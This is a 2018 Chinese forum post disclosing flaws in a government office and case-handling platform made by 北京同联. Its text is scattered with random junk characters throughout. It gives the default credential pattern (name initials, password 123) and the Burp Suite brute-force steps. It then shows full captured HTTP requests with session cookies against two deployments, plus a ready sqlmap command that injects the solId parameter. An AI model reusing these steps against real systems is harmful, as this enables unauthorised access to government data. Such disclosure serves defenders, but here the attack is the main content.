|
' z" S% a& y( V; J* e3 J
' V0 G* A- G& u0 ~* ?
# E& `- F; m, A# Q7 h9 X2 _% e* l
$ J; O3 q" F! P, `" e6 ~ 平台简介:9 U; c7 n+ |0 @
. |1 d' t3 |" E
1 U: i- A* C u 9 d1 l5 o3 k" |2 ~0 W
- D3 Y% G' T- g
6 f F# J8 g0 a& d: [/ b6 I! C" O 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! b( N* x8 r$ U3 @
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: U# ?3 k2 X: X& c: L! }
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
- h) b! U F3 }$ r& \ 0 l) c' X. U) k; N5 d& r
; H3 g T8 Z1 U) R6 ^
: I$ m9 z0 I0 f/ m3 H
3 ^8 m+ }$ F- C% j+ I! ~
- b# G0 m: x! [7 Y 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 k# E! V! l! o7 {2 h' M
9 A1 Z3 _, J4 _1 S7 O- B) V; @ u* Z2 N
( m1 \( ?$ x! _
& a/ F: B' l) M2 [5 _6 J
$ \6 L+ v F/ F4 v9 Q; b% k1 Q2 } http://1.1.1.1:7197/cap-aco/#(案例2-)
, `. {/ c) ]1 n- Q9 L$ z . C6 ~1 E9 K0 F
. H M. `! r- r. b http://www.XXOO.com (案例1-官网网站)5 K" M5 l S+ t" Q
" `- R1 Q/ B0 [' P! A
( X) N+ Z5 W, P" @! {- g3 S
2 N p+ n% ?8 [6 I k% k : F* f- a2 _; q3 c4 t
$ w- v. a" L& x+ r! `; q 漏洞详情:. R& w' R' {7 D$ X& t0 x2 }
8 @; O: U& g) a" K" ^
) y0 {* K4 {/ W: R/ Z
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试- B6 ]$ T: @) G/ f0 _
4 b. V2 W9 p. c& q1 i) P4 e
& S# n( |- U0 }! Z4 S8 G6 i3 A
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# m$ p# }0 b; q
. W+ x. _& [1 i; }! o; P5 x+ H8 x8 ~$ g( Q* c
2 h+ a: v5 O$ m* W4 ] ! I( J1 q' x; \2 z5 F
8 J* E7 Q1 m* w( E) }* K
3 r/ ^* g8 z0 [) f) M9 |7 Y" k0 q
& ^/ v2 Q) [) `$ e
# X; g5 C& K- [3 x' Z status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:5 U w* j( n" K& C% M+ x3 K
! D p+ d$ F4 }% I; q
6 z1 q" J, w' Y q' q3 v, a
1、案例1-官方网站
# Y6 N- [4 g2 U4 D. V6 x2 P- Y $ l, `0 E6 y. W* w1 C
e K; P! ^7 ?2 t GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.10 S5 O. Q L- S5 ]7 ^5 x
+ D9 ]% w: k* \( h, S3 h& Y) M7 @9 d2 W5 v$ n8 v9 t3 x
Host: www.XXOO.com
, M) Z8 I9 L3 i$ O- S* Z5 X
0 |) v& n% H6 ^4 u9 g6 r |6 X R4 @# I; W! H2 [. W0 ]: K
Proxy-Connection: Keep-Alive
5 Z- B7 I, a% `
" e( {* H* z0 b2 D8 [" j' Q% J6 U% Q p5 B- Y
Accept: application/json, text/javascript, */*; q=0.01
' G0 p9 G/ X2 G" S" ~# E/ Q% @
9 t! ]% }9 M. X) O4 v" l4 ?% z% p: F( }0 z9 p
Accept-Language: zh-CN
! p# \+ p8 X7 L W/ z 4 j4 ^" y: U5 {
. a& ?% ], S+ d( ` K2 _0 x Content-Type: application/json" h0 w: y5 {. i% D" }8 Q
; A6 r1 R5 E6 ]* n
+ t0 x8 J. s R H+ G+ a( r User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
0 j- r1 r: W3 V; ^+ _3 w& x4 Q s/ w 2 w- q9 I. K# z) e( H+ K0 I$ l; r
$ |8 P" n1 c- B+ A# k5 r
X-Requested-With: XMLHttpRequest. A/ V/ w, m1 E2 [4 Y% ?
: H& t+ s5 e) J! x
0 u3 n% ^! r- c0 N) V1 b; N/ T' r
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002/ F* ?7 @% F; F3 E
' t1 l5 f4 Y I8 W2 ?9 A0 T5 _$ k9 w/ P
: I# ]/ \' E/ E' |$ B, l$ U6 T Accept-Encoding: gzip, deflate, sdch7 F# ^+ ?" v9 D; S, P3 b' B% Q
, [# d# V1 m5 \- L) u; q
& s% I* H! O2 _; k* @% v* S5 `1 D
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e- z1 n+ s% d0 a5 d
. F+ o4 R% `3 y2 U' @ c% C& w% L, W+ M
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
+ \! H+ U- E8 `, A' k( i0 c ; a6 j/ \1 G( r; U& d' K {" A
$ l. C6 ]1 w4 _
5 I/ Z7 b; r' l : M, n. e u' ~) j8 r
$ A) ^1 j2 E1 Z! Y- a* x, ?8 Z' ~
 1 h4 ^+ {7 \, u) P& _/ V3 \
0 A$ a, p1 ^& s; t2 e4 F' c! _& w0 V# I& p
# {& x5 E6 h$ T( N6 _4 e$ }1 ? ! M$ |& [ k" [ p5 B( z
& h; j3 S/ N+ O- P* c( E' _1 c5 m$ b- I
; ~- w$ G1 b( v9 J7 D) i9 D
- m6 h! a- p6 U" C5 S- i, ]3 u j, e& q
% D6 e; X- y! F9 ^# I8 l0 N7 T 2 H5 m8 w/ A8 `5 K2 c0 Q
3 z u# ^4 w. r4 b 2、案例2-某天河云平台' O) ], y) D' ^ |2 b2 L4 j, I2 g
. H8 A5 T0 T* X$ b6 [$ {9 {
( ]3 ?5 f1 U* f
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.13 c5 Z. o ~# v1 {- w3 h
1 G* p9 y# M% @) k5 C
2 D$ d4 U- m, s Host: 1.1.1.:7197
+ } [# ~5 V# N _) W
2 q8 ]- W$ R5 E3 v, K
1 Z U0 o9 ~0 n! Z2 p' X Accept: application/json, text/javascript, */*; q=0.01
' u# s) l; R2 \; e ( C+ s0 \' p- c
9 _2 U- k1 \$ G6 O. L X-Requested-With: XMLHttpRequest
6 C: R$ F1 D6 O0 F3 m8 f% f5 W
4 b3 Q) ~( ?8 n; f6 V
$ i3 u3 R; O1 t. {0 W4 g User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0( ?- {7 g2 t/ G% P
' [1 Q9 k$ ~8 @! R4 Y
& S& k7 X8 X* W6 T+ L! Y Content-Type: application/json
; P- z2 R* ]- J6 i! z9 P
3 V `' R- L: i! l r0 x# j9 s* w! z6 e- u& P+ X
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
/ h+ Q+ h7 E6 z! c$ G" L* z
0 g' T8 k `( W3 E) ]9 l4 |( e; Q }$ L. t
Accept-Language: zh-CN,zh;q=0.8: o9 i/ @3 h( t( c: I) H+ n
8 [! c! V" g' h# m
" V5 Y% R7 p! d6 |8 j/ g+ a Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
0 F9 W/ p2 l8 Y: K1 N0 K
1 A: A; W/ I- K4 g
9 S" p! \2 C; m+ c Connection: close
" l A2 B; R* B& W
3 d5 S, R8 `( v& l% M+ o8 N: [0 f; L3 V1 A: @) f# W
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
; K. ?4 u1 s8 m+ s9 s . G/ u( W. E/ r. L: e- h; Q
/ Z Z3 [8 F6 E! P \8 A; Q; S
 0 e( A5 ~/ ~ k" D/ Y/ G: n% _/ d
( h9 [4 m8 t* A
* y+ X% r: K9 P
5 i- P8 f1 p5 B4 F | 
发表于 2018-10-20 20:15:17
收藏
支持
反对